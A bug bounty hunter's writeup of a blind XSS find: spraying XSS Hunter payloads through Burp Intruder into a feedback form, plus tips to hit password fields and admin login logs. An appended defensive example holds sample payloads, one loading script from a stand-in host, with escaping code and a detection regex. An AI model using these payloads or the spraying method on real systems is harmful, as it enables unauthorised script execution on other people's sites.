Hello amazing hackers, my name is Deepak Dhiman (also known as @Virdoex_hunter in the bug bounty community). I am a bug bounty hunter; I hunt when I want to (looking for a job or internship). Today I'll share my first bounty experience on Bugcrowd (after clickbaiting, no support and no invites). I hope you will enjoy it and learn something.
When I started hacking on Bugcrowd I came to know it's a nice platform for beginners (at that time I knew only a few bugs and had little experience). My first 4 reports were duplicates and I got 4 points. I felt cool, but after some time they marked every report of mine N/A, and after I gave some negative points on feedback in researcher experience I stopped receiving any private invites.
Since I was not receiving any private invites and had only 14 points, I looked for private programs using dorks. I asked Aditya Shende bro which dork list I should use to find programs, and he recommended a GitHub repo which helped me find programs and hunt.
So finally I was sending reports on Bugcrowd, and this year in March 21 I submitted an email HTMLi bug on a private (joinable) program. In the first 14 days they changed 4 triagers and every one asked me for the PoC again and again, and after 2 months of triage they marked it a duplicate of an XSS (since you cannot log in, it could never be possible), meaning a false one. Then I asked them to invite me to that report (I know on Bugcrowd it's not) because I wanted to see whether it was really a duplicate, but they didn't give me any response. So I left it, and then I reported my favorite bug, DoS, on 3 different programs and they marked it duplicate by changing the priority from P3 to P2. Finally I found the same DoS on a program where it was valid, and at that time they made it P5. I mailed their support team but have had no response for the last 3 months (if it's not clickbaiting then let me know what it is). So I tweeted to the support team, but they responded that they would ban me instead of giving me a fair result.
So one day I was hunting on an RDP and there was a feedback form on products, so I went to xsshunter.com/app and copied all my payloads. I put "test" in every field (except email), in name, message etc., intercepted the request in Burp, sent it to Intruder, chose "test" as the position (every test), used the Pitchfork attack, chose Simple list as the payload type, pasted all my XSS Hunter payloads and clicked Start attack. After 5 hours I got an email notification that my payload had triggered, and in the first week it triggered 30 times and I got the IPs of 3 employees who were logged in to the 3rd-party application that handles the forms. I reported it, and the next day they invited me on Bugcrowd and rewarded me with $$$.
Don't give negative feedback on the platform.
For blind XSS, put your payload in every kind of input field (even in the password field and in wrong attempts on the admin panel, because sometimes it saves logs of the creds tried for admin, and your blind XSS payload may work there).
You can also use Intruder for encoding to bypass protection.
I hope you like this writeup.
Thank you for giving your time on this.
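For the team that owns a form-handling panel like the one in this writeup, the fix is to encode every stored field when it is rendered, including values that arrive through failed-login logs. The sketch below is an added example, not code from the original post or the affected program; the records, field names, function names and the CSP string are constructed assumptions.

```javascript
// Added example. Records, field names and function names are constructed
// for illustration; they do not come from the program in the writeup.
const records = [
  { source: "feedback", name: "Alice", message: "Love the product & support" },
  { source: "feedback", name: "<script src=//collector.example/p.js></script>", message: "hi" },
  { source: "failed-admin-login", name: "admin", message: '"><img src=x onerror=alert(1)>' },
];

const FIELDS = ["source", "name", "message"];

// Encode the five characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// The 'before': stored values concatenated straight into the panel's markup.
function renderRowUnsafe(rec) {
  return "<tr>" + FIELDS.map((f) => "<td>" + rec[f] + "</td>").join("") + "</tr>";
}

// The 'after': every stored field is encoded at output time, whatever its source.
function renderRowSafe(rec) {
  return "<tr>" + FIELDS.map((f) => "<td>" + escapeHtml(rec[f]) + "</td>").join("") + "</tr>";
}

// Triage helper: list stored fields that carry script-bearing markup so they
// can be reviewed before anyone opens them in a browser.
const MARKUP = /<\s*script\b|\bon\w+\s*=|javascript:/i;
function flagSuspicious(list) {
  const found = [];
  list.forEach((rec, index) => {
    for (const field of FIELDS) {
      if (MARKUP.test(String(rec[field]))) found.push({ index, field });
    }
  });
  return found;
}

// Response header for the panel as a second layer: no inline or third-party script.
const PANEL_CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

console.log(flagSuspicious(records));
console.log(renderRowSafe(records[1]));
```

The pattern in `flagSuspicious` is a coarse review aid and will miss encoded variants; output encoding in `renderRowSafe` is the control that actually stops the stored value from executing.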